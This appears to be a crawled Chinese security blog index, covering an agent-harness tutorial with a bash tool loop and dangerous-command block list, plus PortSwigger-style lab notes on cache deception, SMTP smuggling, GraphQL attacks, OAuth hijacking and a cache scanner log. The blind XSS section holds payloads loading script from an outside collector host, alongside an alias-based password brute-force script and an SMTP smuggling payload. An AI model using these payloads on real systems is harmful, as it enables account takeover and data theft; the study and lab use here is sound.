L的博客

agent开发构建 Harness从0-1的学习

2026-03-17T13:53:39.000Z

本文学习于github项目learn-claude-code

什么不是agent

人们总是想当然的以为agent就是简单的提示词注入，然而实际不然。当通过过多的提示词来对AI进行限制时，AI便失去了其发散性，失去了泛化能力。

什么是agent的开发

现代意义的agent的开发往往有两个意思

训练模型
通过强化学习、微调、RLHF 或其他基于梯度的方法调整权重。收集任务过程数据 — 真实领域中感知、推理、行动的实际序列 — 用它们来塑造模型的行为。这是 DeepMind、OpenAI、腾讯 AI Lab、Anthropic 在做的事。这是最本义的 Agent 开发。
构建 Harness
通过代码来编写一个可以提供给AI操控的环境架构。这个是本文需要学习的内容

Harness的结构

Harness = Tools + Knowledge + Observation + Action Interfaces + Permissions
Tools 工具，提供给AI调用的工具，如shell，文件读取功能，网络搜索，浏览器，数据库
Knowlege 提供给Ai的知识库，上下API规范，产品文档，领域资料，风格等
Observation 错误日志，git diff
Action: 其实就是前端，如何于用户进行交互
Permissions: 权限，限制沙箱

开始学习

这个项目共有12个harness。每个harness都在前一个循环上加一个harness机制

Claude API 返回的整体结构

不同AI返回的json格式不太相同。学习之前先了解邮箱claude返回的json内容结构。这样更容易看懂

{
  "id": "msg_xxx",
  "type": "message",
  "role": "assistant",
  "content": [...],
  "model": "...",
  "stop_reason": "end_turn / tool_use / max_tokens / ...",
  "usage": {
    "input_tokens": 123,
    "output_tokens": 456
  }
}

重点字段content

这个字段是AI返回的内容一般有如下几种格式

普通文本回复

{
  "content": [
    {
      "type": "text",
      "text": "当前目录有 file1 和 file2"
    }
  ]
}

调用工具

{
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_123",
      "name": "bash",
      "input": {
        "command": "ls"
      }
    }
  ]
}

混合

{
  "content": [
    {"type": "text", "text": "我先查看目录"},
    {
      "type": "tool_use",
      "id": "toolu_123",
      "name": "bash",
      "input": {"command": "ls"}
    }
  ]
}

重点字段 stop_reason

1	"stop_reason": "tool_use"

其一般有如下几个值

end_turn                    正常结束（回答完了）
tool_use                    要调用工具
max_tokens                  被截断
stop_sequence               命中停止词

usage（token统计）

"usage": {
  "input_tokens": 120,
  "output_tokens": 300
}

表示输入输出的token量

role

1	"role": "assistant"

表示这个为模型输出

核心循环

最核心的循环代码

def agent_loop(messages):
    while True:
        response = client.messages.create(
            model=MODEL, system=SYSTEM,
            messages=messages, tools=TOOLS,
        )
        messages.append({"role": "assistant",
                         "content": response.content})

        if response.stop_reason != "tool_use":
            return

        results = []
        for block in response.content:
            if block.type == "tool_use":
                output = TOOL_HANDLERS[block.name](**block.input)
                results.append({
                    "type": "tool_result",
                    "tool_use_id": block.id,
                    "content": output,
                })
        messages.append({"role": "user", "content": results})

从代码可以看出来其就是不断的循环与AI进行对话，将AI返回的结果当做assistant的信息写如message，如果返回内容有调用工具就调用后将结果再次传入messages，其传入的role为user这主要是因为只有权限为user时大模型才会进行解析并回复。所有要将工具的执行结构给AI解析从而判断下一步是结束还是继续调用工具。不断循环直到stop_reason!=”tools_use”即不AI不需要使用工具时跳出循环。

s01 “One loop & Bash is all you need” — 一个工具 + 一个循环 = 一个智能体

#!/usr/bin/env python3
"""
s01_agent_loop.py - The Agent Loop
The entire secret of an AI coding agent in one pattern:
    while stop_reason == "tool_use":
        response = LLM(messages, tools)
        execute tools
        append results
    +----------+      +-------+      +---------+
    |   User   | ---> |  LLM  | ---> |  Tool   |
    |  prompt  |      |       |      | execute |
    +----------+      +---+---+      +----+----+
                          ^               |
                          |   tool_result |
                          +---------------+
                          (loop continues)
This is the core loop: feed tool results back to the model
until the model decides to stop. Production agents layer
policy, hooks, and lifecycle controls on top.
"""
import os
import subprocess
from anthropic import Anthropic
from dotenv import load_dotenv
load_dotenv(override=True)
if os.getenv("ANTHROPIC_BASE_URL"):
    os.environ.pop("ANTHROPIC_AUTH_TOKEN", None)
client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL"))
MODEL = os.environ["MODEL_ID"]
SYSTEM = f"You are a coding agent at {os.getcwd()}. Use bash to solve tasks. Act, don't explain."
TOOLS = [{
    "name": "bash",
    "description": "Run a shell command.",
    "input_schema": {
        "type": "object",
        "properties": {"command": {"type": "string"}},
        "required": ["command"],
    },
}]
def run_bash(command: str) -> str:
    dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"]
    if any(d in command for d in dangerous):
        return "Error: Dangerous command blocked"
    try:
        r = subprocess.run(command, shell=True, cwd=os.getcwd(),
                           capture_output=True, text=True, timeout=120)
        out = (r.stdout + r.stderr).strip()
        return out[:50000] if out else "(no output)"
    except subprocess.TimeoutExpired:
        return "Error: Timeout (120s)"
# -- The core pattern: a while loop that calls tools until the model stops --
def agent_loop(messages: list):
    while True:
        response = client.messages.create(
            model=MODEL, system=SYSTEM, messages=messages,
            tools=TOOLS, max_tokens=8000,
        )
        # Append assistant turn
        messages.append({"role": "assistant", "content": response.content})
        # If the model didn't call a tool, we're done
        if response.stop_reason != "tool_use":
            return
        # Execute each tool call, collect results
        results = []
        for block in response.content:
            if block.type == "tool_use":
                print(f"\033[33m$ {block.input['command']}\033[0m")
                output = run_bash(block.input["command"])
                print(output[:200])
                results.append({"type": "tool_result", "tool_use_id": block.id,
                                "content": output})
        messages.append({"role": "user", "content": results})
if __name__ == "__main__":
    history = []
    while True:
        try:
            query = input("\033[36ms01 >> \033[0m")
        except (EOFError, KeyboardInterrupt):
            break
        if query.strip().lower() in ("q", "exit", ""):
            break
        history.append({"role": "user", "content": query})
        agent_loop(history)
        response_content = history[-1]["content"]
        if isinstance(response_content, list):
            for block in response_content:
                if hasattr(block, "text"):
                    print(block.text)
        print()

来一个个解释S01_agent_loop的源码吧

client.messages.create其实就是于AI进行对话。

client.messages.create参数解释

model

其中参数model模型参数

system

system参数就是提示词

messages

messages=messages其中meassage其实就是对话记录

其中role分别有user,assistant,system这三种权限。user就是输入给模型的信息模型会对这个做出应答。assistant表示模型的输出。而system就是输入的提示词，这里其实就是代码中的SYSTEM=xxxx

tools=TOOLS

本质就是给模型定义工具规范（Tool Schema）其实就是工具描述

TOOLS = [{
    "name": "bash",
    "description": "Run a shell command.",
    "input_schema": {
        "type": "object",
        "properties": {"command": {"type": "string"}},
        "required": ["command"],
    },
}]

description其实就是工具的提示词主要让AI知道这个是什么工具
name 就是工具名称
input_schema就是工具参数输入的格式。

"type": "object"                                    工具输入类型必须是一个对象
"properties": {"command": {"type": "string"}}       工具所需要的参数名称和类型
"required": ["command"]                             必须要有的参数

流程总结

上面描述的只要能看懂那么我们就能很轻松的了解这第一个agent的代码了。
其流程其实就是一个工具一个循环，流程图如下

s02 “加一个工具, 只加一个 handler” — 循环不用动, 新工具注册进 dispatch map 就行

s03 “没有计划的 agent 走哪算哪” — 先列步骤再动手, 完成率翻倍

s04 “大任务拆小, 每个小任务干净的上下文” — 子智能体用独立 messages[], 不污染主对话

s05 “用到什么知识, 临时加载什么知识” — 通过 tool_result 注入, 不塞 system prompt

s06 “上下文总会满, 要有办法腾地方” — 三层压缩策略, 换来无限会话

s07 “大目标要拆成小任务, 排好序, 记在磁盘上” — 文件持久化的任务图, 为多 agent 协作打基础

s08 “慢操作丢后台, agent 继续想下一步” — 后台线程跑命令, 完成后注入通知

s09 “任务太大一个人干不完, 要能分给队友” — 持久化队友 + 异步邮箱

s10 “队友之间要有统一的沟通规矩” — 一个 request-response 模式驱动所有协商

s11 “队友自己看看板, 有活就认领” — 不需要领导逐个分配, 自组织

s12 “各干各的目录, 互不干扰” — 任务管目标, worktree 管目录, 按 ID 绑定

云安全

2026-03-11T11:16:07.000Z

openclow

2026-02-28T07:01:02.000Z

Hey, password is required here.

对LuaN1aoAgent的解析学习

2026-02-17T08:44:29.000Z

验证码登陆，注册流程解析，可能出现的漏洞问题解析

2026-01-12T10:26:56.000Z

aaa

2025-12-28T06:14:27.000Z

Web cache deception

什么是缓存，什么是Cache keys？

其实大家应该都知道缓存是为了加快访问而存在的，如一个学校官网，在你第一次访问时如果是会将页面存到缓存中，后面再缓存有效期的访问中都是从缓存服务器中给的响应。

而当一个页面被缓存时，你通过不同客户端访问也是可以得到相同的缓存内容的

Cache keys

Cache keys就是由于判断请求是否为重复相同请求的。一般是url路径加上一些请求标头

什么会被缓存

1.静态文件如.js .css .jpg .txt

2.静态目录，由开发者设定

3.固定缓存路径

为什么会产生这个漏洞以及漏洞目的

我们看上面的图片可以发现其存在缓存服务器和源服务器。

而这个两个服务器对应不同的web cache key，url路径的处理有可能是不同的，当这些产生差异的时候就容易产生漏洞

比如源服务器会将; 当成分隔符直接忽略到后面的所有路径而缓存服务器不会。

而这个时候如果其缓存逻辑是我上述的1，即当路径会静态文件时就会产生缓存劫持

如果这个页面存在用户信息，比如其路径未userinfo

这时候当我们访问的是/userinfo;a.js时就会导致

缓存服务器将其识别为可缓存页面，而源服务器会将其识别为userinfo。

portswigger 缓存路径欺骗靶场2，路径分隔的差异导致的缓存

靶场

登陆后发现直接回显密钥且这个页面不可以缓存

先尝试再后面直接加上aaa查看器是否会强制转换路由

不会，那么接下来就是找这个服务的分隔符了，分隔符也就是类似于tomcat的;这种截断字符
将url编码和非编码都进行尝试

问好与分号是分隔符

后面加上;aa.js这样服务器就会将其认为是js静态文件。进行缓存而因为服务器会将;进行分隔，这导致应该不可缓存的页面被缓存。?经尝试不行

这样我们只要将这隔发给被攻击着就可以得到器缓存再服务器的密钥

编辑exp

被缓存

Puny-Code, 0-Click Account Takeover

什么是punycode其作用是什么

下面是我从某个域名注册网站截的图

在域名解析时，如果域名为非ascii字符就会将其编码成punycode进行解析，而邮件服务即smtp服务其实就是这个逻辑，即当smtp遇到类似user@gẩmil.com会将其解析为xn—user@gmil-gb7d.com

而有趣的来了，当mysql在解析user@gẩmil.com会将其与user@gamil.com划等号即这种IDN的ẩ与a在mysql环境是相同的

下面是忘记密码时一般服务器的流程

上面的导图当server 过分信任用户的注入直接将tonken发送给用户传入的邮箱就会导致账户劫持

2020-2024top-10-web-hacking-techniques-of-2023

2025-12-09T08:37:24.000Z

无聊在刷portswigger时发现portswigger原来还有对年度十大研究成果进行排名，感觉都挺有意思的。

2023/top3：SMTP走私——全球范围内的电子邮件伪造

所谓SMTP请求走私就是利用SMTP服务器的发送端和接收端的差异而进行的。

SMTP报文结果，发送端和接受端的简介

首先我们得先了解一下发送端于接受端的功能对应报文的处理

报文结构

From: Alice \r\n
To: Bob \r\n
Subject: Test\r\n
Date: Thu, 10 Dec 2025 15:30:00 +0800\r\n
\r\n
Hello Bob,\r\n
This is a test email.\r\n
.\r\n

可以发现其实就是邮件头加消息即body的结构，然后使用单独一行的.即 . 来当结束符。

发送端于发送端的差异

首先发送端遇到 . 即结束符号时会进行截断直接不解析后面的即只将 . 前的内容发送给接收端
而非常有趣的是当接受端收到 . 却会继续解析后面的smtp命令。

产生原因

前面我们说了发送端和接受端对 . 即结束符的处理方法是不同的。但是单纯的使用 . 是无法走私成功的，这个漏洞需要当发送端无法解析类似 . 或者 . 这种形式的单行.而接受端却可以解析。

那么就会造成攻击者构造如下报文

data\r\n
From: user@gmx.net\r\n
To: user@provider.example\r\n
Subject: Message #1\r\n
\r\n
lorem ipsum
\n.\r\n
mail FROM:\r\n
rcpt TO:\r\n
data\r\n
From: admin@gmx.net\r\n
To: user@provider.example\r\n
Subject: Message #2\r\n
\r\n
I am the admin now!
\r\n.\r\n

上面的payload就有可能造成发送端无法识别

盲xss

2025-11-05T10:42:17.000Z

https://conote.xsslse.xyz/xss

conote+飞书通知
payload如下
Import:
Script:
Input:
Img:
Video:
IFrame:
XMLHTTP:

">
">
">
">
">
">

JS-URI:

1	javascript:eval('var a=document.createElement(\'script\');a.src=\'https://lse11.cn/Kq8Snzf8.js?n=0d1a98\';document.body.appendChild(a)')

JQuery:

1 2	<script>$.getScript("//lse11.cn/Kq8Snzf8.js?n=0d1a98")script>

信息收集

2025-11-04T06:05:14.000Z

子域名+探活

subfinder

1	subfinder -dL domain.txt -all >> domians1.txt

oneforall

1	python3 oneforall.py --targets domain.txt run

httpx

1	cat all_domains.txt\|httpx -ports 80,443,8080,8000,8888,8443 -sc -title -mc 200,404,403,302 -threads 200 \|tee subdomains_alive.txt

Tscan截图

渗透时naabu发现非80，443的web端口

url收集

被动收集

gau+our

gau容易被ban

1	cat livesubdomains.txt \| gau \| sort -u > urls2.txt

VirusTotal.sh+our

https://github.com/coffinxp/scripts/blob/main/virustotal.sh

GraphQL

2025-10-31T09:49:48.000Z

什么是GraphQL?

GraphQL 其实就是一种api查询语言,其可以对api端点的数据进行查询,修改删除,和订阅。

什么是GrapQL的查询

其实也就是query关键词
比如如下代码

query myGetProductQuery {
    getProduct(id: 123) {
        name
        description
    }
}

其中myGetProductQuery是我们自定义的，数据名查询后的内容会以这个为key值
内部的getProduct(id: 123)，这个操作其实就是类似于调用一个内部已经定义好的函数，传入的参数是id值为123，内部的name和description其实就是要求其返回的数据段。

什么是 GraphQL mutations

mutations就是以某一种方法来更改数据，添加和删除数据。这个结构其实和查询差不多，其实也是调用了内部自定义好的接口

mutation {
    createProduct(name: "Flamin' Cocktail Glasses", listed: "yes") {
        id
        name
        listed
    }
}

{
    "data": {
        "createProduct": {
            "id": 123,
            "name": "Flamin' Cocktail Glasses",
            "listed": "yes"
        }
    }
}

变量

graphql是可以设置变量的

query getEmployeeWithVariable($id: ID!) {
    getEmployees(id:$id) {
        name {
            firstname
            lastname
        }
     }
}

Variables:
{
    "id": 1
}

在查询这类操作中一个使用$xx来代表变量然后再Variables字段设置变量的值

别名

query getProductDetails {
    product1: getProduct(id: "1") {
        id
        name
    }
    product2: getProduct(id: "2") {
        id
        name
    }
}

GraphQL可以设置别名如上面的，设置别名的原因主要是返回的是json，而GraphQL再查询时返回的值会包含查询的名称，如果查询时出现两个相同的就会出现问题于是就有了别名，让其返回两个不同的json key值

{
       "data": {
           "product1": {
               "id": 1,
               "name": "Juice Extractor"
            },
           "product2": {
               "id": 2,
               "name": "Fruit Overlays"
           }
       }
   }

Fragments

Fragments就是一个定义好的字段组合，再query和mutation时可以直接使用Fragments

fragment productInfo on Product {
    id
    name
    listed
}
    query {
    getProduct(id: 1) {
        ...productInfo
        stock
    }
}

Subscriptions

Subscriptions是一种特殊类型的查询。它们使客户端能够与服务器建立长期连接，以便服务器可以将实时更新推送到客户端，而无需持续轮询数据。它们主要用于对大型对象的微小更改以及需要小型实时更新的功能（如聊天系统或协作编辑）。

与常规查询和突变一样，订阅请求定义要返回的数据的形状。

订阅通常使用 WebSocket 实现。

Introspection

Introspection 是一个内置的 GraphQL 函数，使您能够查询服务器以获取有关架构的信息。它通常由 GraphQL IDE 和文档生成工具等应用程序使用。

与常规查询一样，您可以指定要返回的响应的字段和结构。例如您可能希望响应仅包含可用突变的名称。

内省可能代表严重的信息泄露风险，因为它可用于访问潜在的敏感信息信息（例如字段描述），并帮助攻击者了解如何与 API 交互。是的在生产环境中禁用自省的最佳实践。

图形化界面

https://apis.guru/graphql-voyager/

靶场

访问私有GraphQL帖子

一点进去就可以发现GraphQL端点

使用bp自带的功能来进行GraphQL内省
我们可以将内省的结果发送到https://apis.guru/graphql-voyager/进行图形化的查看

可以发现BlogPost是存在postPassword的

我们可以将这个请求发送到inQL插件这个插件会对内省查询的结果进行分类。并写好查询语句

通过getAllBlogPosts我们可以发现其批量查询的结果中没有id=3的数据
我们通过page来搜索运行id为三的内容

发现了

意外暴露私有GraphQL字段

可以发现查询用户的查询

直接查询得到了用户密码
然后登陆删除账号即可

查找隐藏的GraphQL端点

发现一个api
发送隔请求发现其返回400告诉我们请求为空
这个可能是GraphQL导致的报错我们可以尝试使用GraphQL请求试试

1	/api?query=query{__typename}

果然存在直接产生内审

发现其加了黑名单其禁止__schema和__type

遇到这种情况可以尝试再后面加上换行符进行饶过
这个端点只能GET请求，inql的get请求好像有问题。但是没问题可以将其保存为文件如何加载

只有一个查询id和name的和删除用户的、

input直接输入3会发现报错{value:3}猜测input是一个查询的匹配如id=3 username=xxx这种

绕过GraphQL暴力保护

使用GraphQL可以饶过密码爆破的速率限制使用别名来通过一个请求进行多次登陆尝试

copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
        token
        success
    }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");

上面的脚本就是将密码一个个替换到下面的payload中
将上面的js脚本再控制台运行就可以将payload复制到剪切板。

通过GraphQL执行CSRF漏洞

这是因为GraphQL可能导致不通过csrf_token来进行csrf攻击
将json的请求转换为post url的请求

query=%0D%0A++++mutation+changeEmail%28%24input%3A+ChangeEmailInput%21%29+%7B%0D%0A++++++++changeEmail%28input%3A+%24input%29+%7B%0D%0A++++++++++++email%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A&operationName=changeEmail&variables=%7B%22input%22%3A%7B%22email%22%3A%22wiener1111%40normal-user.net%22%7D%7D

如何使用bp转为csrf请求即可实现csrf攻击

ffuf使用手册

2025-10-31T06:17:58.000Z

OAuth2.0认证解析与威胁

2025-10-27T10:26:54.000Z

什么是OAuth2.0认证

OAuth2.0其实就是第三方登陆的一种授权类型，其给授权流程定义了一个标准。

Oauth的流程与种类

隐式

#

识别OAuth认证与OAuth的攻击注意

一般Oauth登陆的文章再文件进入时会向授权服务端发送类似如下的请求

1 2	https://xxxx.xx/auth?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 Host: oauth-authorization-server.com

当然参数不止有如上的两个还有很多，但是一般都会包含着两个参数
再发现服务端时我们可以尝试服务如下路径来尝试查看其配置文件

1 2	/.well-known/oauth-authorization-server /.well-known/openid-configuration

靶场：通过OAuth隐式流程绕过认证

其实这个靶场更加类似于idor。
首先隐式流程会将中间的session直接返回前端而不是客户端的后端，着导致其任意被浏览器插件之类的劫持，所以相对不安全，目前也没有几个使用隐式流程的Oauth了。

通过OpenID注册导致的ssrf

CSRF保护有缺陷

OAuth账户被redirect_uri劫持

redirect_uri就是一个重定向标识，当这个标识服务端并没有验证其合法性可以进行篡改时就会造成服务端会将最后的token重定向到攻击者定义的redirect_uri从而造成redirect_uri被篡改。

这个威胁再绝大多数常见下其实只要被登陆态的用户点击一下就会造成token的劫持。因为登陆态的用户一般都会再浏览器中存储下oauth验证流程的中间session从而自动跳过密码输入，重新生成一个token然后重定向到redirect_uri从而将token泄露。造成1点击账号劫持，如果这个平台是个可以发送帖子的平台且存在iframe表单的html注入那么久会造成0点击账号劫持

靶场

通过代理页面窃取代码和访问令牌

通过开放重定向

通过xss，html注入等

缓存劫持扫描器

2025-10-22T08:20:28.000Z

爬虫模块。

使用ktana来进行url的主动爬取，深度要可选择，默认就2吧
使用gau来被动获取url
将获取的所有url丢到下面的缓存检测模块进行检测，并标记上是否缓存进行分类。以方便下面的缓存逻辑检测模块

缓存检测模块

对同一个url进行3次请求，当三次中出现了如下的响应头的规范就缓存命中

cdn

出现如下响应头时其缓存命中


CDN提供商缓存状态响应头字段表示命中的值响应头示例
CloudflareCF-Cache-StatusHITCF-Cache-Status: HIT
AWS CloudFrontX-CacheHit from cloudfrontX-Cache: Hit from cloudfront
AkamaiX-Cache, Server-Timing包含HIT的值X-Cache: TCP_HIT, Server-Timing: cdn-cache; desc=HIT
FastlyX-Cache, X-Served-ByHITX-Cache: HIT, HIT, X-Served-By: cache-hkg17926-HKG
Varnish CacheX-Cache, X-Cache-HitsHITX-Cache: HIT, X-Cache-Hits: 4
Nginx Proxy CacheX-Proxy-Cache, X-CacheHITX-Proxy-Cache: HIT
百度云加速X-CacheHIT from baiducdnX-Cache: HIT from baiducdn
腾讯云CDNX-Cache-Lookup, X-CacheHit From DisktankX-Cache-Lookup: Hit From Disktank
阿里云CDNX-Cache, Ali-Swift-Global-SavetimeHIT from cdnX-Cache: HIT from cdn, Ali-Swift-Global-Savetime: 1700000000
七牛云CDNX-Cache, X-LogHITX-Cache: HIT, X-Log: Qiniu;...
华为云CDNX-Cache, X-Cache-LookupHIT from cacheX-Cache: HIT from cache
网宿CDNX-CacheHIT from wangsuX-Cache: HIT from wangsu
又拍云X-Cache, X-Upyun-Content-LengthHITX-Cache: HIT, X-Upyun-Content-Length: 12345
京东云CDNX-Cache, X-Cache-LookupHit from JDCDNX-Cache-Lookup: Hit from JDCDN
百度智能云X-BD-Cache-StatusHITX-BD-Cache-Status: HIT
Google Global CacheAge, ViaAge > 0Age: 600, Via: 1.1 google

CDN / 缓存系统	命中标识字段	常见取值	是否命中缓存	示例响应头
Cloudflare	`CF-Cache-Status`	`HIT` / `MISS` / `EXPIRED` / `BYPASS` / `DYNAMIC`	✅ `HIT` 表示命中	`CF-Cache-Status: HIT` `Age: 523`
AWS CloudFront	`X-Cache`	`Hit from cloudfront` / `Miss from cloudfront` / `Error from cloudfront`	✅ `Hit from cloudfront`	`X-Cache: Hit from cloudfront` `Age: 214`
Akamai	`X-Cache`、`Server-Timing`	`TCP_HIT` / `TCP_MISS` / `TCP_REFRESH_HIT` / `TCP_EXPIRED_HIT`	✅ 含 `HIT` 的值均表示命中	`X-Cache: TCP_HIT` `Server-Timing: cdn-cache; desc=HIT`
Fastly	`X-Cache`、`X-Served-By`	`HIT` / `MISS` / `PASS`	✅ `HIT`	`X-Served-By: cache-hkg17926-HKG` `X-Cache: HIT, HIT`
Varnish Cache	`X-Cache`、`X-Cache-Hits`、`Via`	`HIT` / `MISS` / `BYPASS`	✅ `HIT`	`X-Cache: HIT` `X-Cache-Hits: 4` `Via: 1.1 varnish`
Nginx Proxy Cache	`X-Proxy-Cache`、`X-Cache`	`HIT` / `MISS` / `BYPASS`	✅ `HIT`	`X-Proxy-Cache: HIT`
百度云加速（Baidu Cloud CDN）	`X-Cache`	`HIT from baiducdn` / `MISS from baiducdn`	✅ `HIT`	`X-Cache: HIT from baiducdn`
腾讯云 CDN（Tencent Cloud CDN）	`X-Cache-Lookup`、`X-Cache`	`Hit From Disktank` / `Miss From Upstream` / `Bypass`	✅ `Hit`	`X-Cache-Lookup: Hit From Disktank`
阿里云 CDN（Aliyun CDN）	`X-Cache`、`Ali-Swift-Global-Savetime`	`HIT from cdn` / `MISS from cdn`	✅ `HIT`	`X-Cache: HIT from cdn` `Ali-Swift-Global-Savetime: 1700000000`
七牛云 CDN（Qiniu CDN）	`X-Cache`、`X-Log`	`HIT` / `MISS`	✅ `HIT`	`X-Cache: HIT` `X-Log: Qiniu;...`
华为云 CDN（Huawei Cloud CDN）	`X-Cache`、`X-Cache-Lookup`	`HIT from cache` / `MISS from origin`	✅ `HIT`	`X-Cache: HIT from cache`
网宿 CDN（Wangsu CDN）	`X-Cache`	`HIT from wangsu` / `MISS from wangsu`	✅ `HIT`	`X-Cache: HIT from wangsu`
又拍云（UPYUN）	`X-Cache`、`X-Upyun-Content-Length`	`HIT` / `MISS`	✅ `HIT`	`X-Cache: HIT` `X-Upyun-Content-Length: 12345`
京东云 CDN（JD Cloud）	`X-Cache`、`X-Cache-Lookup`	`Hit from JDCDN` / `Miss from Upstream`	✅ `Hit`	`X-Cache-Lookup: Hit from JDCDN`
百度智能云 BOS/CDN	`X-BD-Cache-Status`	`HIT` / `MISS` / `EXPIRED`	✅ `HIT`	`X-BD-Cache-Status: HIT`
Google Global Cache (GGC)	`Age` / `Via`	无特定标志，命中时 `Age` > 0	✅ 有 `Age` 且 > 0	`Age: 600` `Via: 1.1 google`

反向代理

反向代理系统	命中标识字段	可能值	是否命中	示例
Nginx Proxy Cache	`X-Proxy-Cache`	`HIT` / `MISS` / `BYPASS` / `EXPIRED`	✅ `HIT` 表示命中	`X-Proxy-Cache: HIT`
	`X-Cache-Status`（新版）	`HIT` / `MISS` / `BYPASS`	✅ `HIT`	`X-Cache-Status: HIT`
Varnish Cache	`X-Cache` / `X-Cache-Hits` / `Via`	`HIT` / `MISS` / `BYPASS`	✅ `X-Cache: HIT`	`X-Cache: HIT` `Via: 1.1 varnish`
Squid Proxy	`X-Cache` / `X-Cache-Lookup`	`HIT from proxy` / `MISS from proxy`	✅ 包含 `HIT`	`X-Cache: HIT from squid`
Apache Traffic Server (ATS)	`X-Cache` / `X-Cache-Key` / `Via`	`HIT` / `MISS` / `STALE` / `REVALIDATED`	✅ `HIT`	`X-Cache: HIT` `Via: http/1.1 ats (ApacheTrafficServer)`
LiteSpeed / OpenLiteSpeed	`X-LiteSpeed-Cache`	`hit` / `miss` / `no-cache` / `force-recache`	✅ `hit`	`X-LiteSpeed-Cache: hit`
Nginx + FastCGI Cache	`X-FastCGI-Cache`	`HIT` / `MISS` / `BYPASS`	✅ `HIT`	`X-FastCGI-Cache: HIT`

缓存逻辑检测

1.静态文件缓存逻辑

有些服务器会将静态后缀文件设置为缓存。
直接对传入的url添加a.js,a.css等即发送https://xxxxxx/a.js或者http://xxxxxxxx/a.js
当缓存命中时则存在静态文件缓存逻辑

2.分隔符验证

选择一个不可缓存的路径，可以优先查找login这类动态页面，如果爬取的url中没用则随机选择。注意需要这个页面返回200如果非200换一个，直到200
然后对这个url进行如下操作，下面以url为http://xxxxx/login举例（具体url根据实际情况获取）
再url后直接添加一个aa如http://xxxxx/login变为http://xxxxx/loginaa如果两个页面的返回相同则后端做了强制校验换一个路径
当http://xxxxx/login与http://xxxxx/loginaa不同时，使用如下字典来进行分隔符检测

!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
:
;
<
=
>
?
@
[
\
]
^
_
`
{
|
}
~
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2A
%2B
%2C
%2D
%2E
%2F
%3A
%3B
%3C
%3D
%3E
%3F
%40
%5B
%5C
%5D
%5E
%5F
%60
%7B
%7C
%7D
%7E

将这些字符一个个的嵌入http://xxxxxx/xxxx{字典中的分隔符}aa
如果这个url与http://xxxxxx/xxxx返回相同则那个字符即为分隔符

3.静态目录缓存检测

提取出专门存在静态问题的目录，再后面加上不存在文件aaaa如果换成则其存静态目录缓存，如果有多个静态目录就提取多个检测
举例
如果爬虫爬出了如下路径

1
2
3

http://xxxxxx/static/aa.js
http://xxxxxx/static/aa.css
http://xxxxxx/static/aa.txt

那么http://xxxxxx/static/就是静态目录再后面加上aaaaa即http://xxxxxx/static/aaaaa
若缓存则存在静态目录缓存逻辑

4.服务器规范化检测

缓存服务器规范化

../规范化

从爬取的url中获取一个可缓存的url,如果存在静态文件缓存则不找静态文件的路径
如http://xxxxxxx/aaa
如果http://xxxxxxx/a/..%2faaa可缓存则存在缓存服务器规范化

源服务器规范化

提取一个爬取url随便什么。如http://xxxxx/test
访问http://xxxxx/a/..%2ftest
当两个请求的body相同时存在源服务器规范化

出现如下逻辑组合则大概率存在漏洞

静态文件缓存+分隔符

静态目录缓存+缓存服务器规范化

缓存服务器规范化+源服务器不规范化

源服务器规范化，但缓存没有规范化

[*] 扫描完成.
root@VM-4-16-debian:~/cache# go build -o cache-hijacking-scanner
root@VM-4-16-debian:~/cache# ./cache-hijacking-scanner -u https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/ -d 2 -v

[] 正在运行缓存逻辑检测模块…
2025/10/23 20:44:57 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.js
2025/10/23 20:44:57 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.js
2025/10/23 20:44:58 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.js
2025/10/23 20:44:58 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.css
2025/10/23 20:44:58 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.css
2025/10/23 20:44:58 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.css
2025/10/23 20:44:58 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.jpg
2025/10/23 20:44:58 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.jpg
2025/10/23 20:44:59 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.jpg
2025/10/23 20:44:59 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.png
2025/10/23 20:44:59 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.png
2025/10/23 20:44:59 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.png
2025/10/23 20:44:59 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.gif
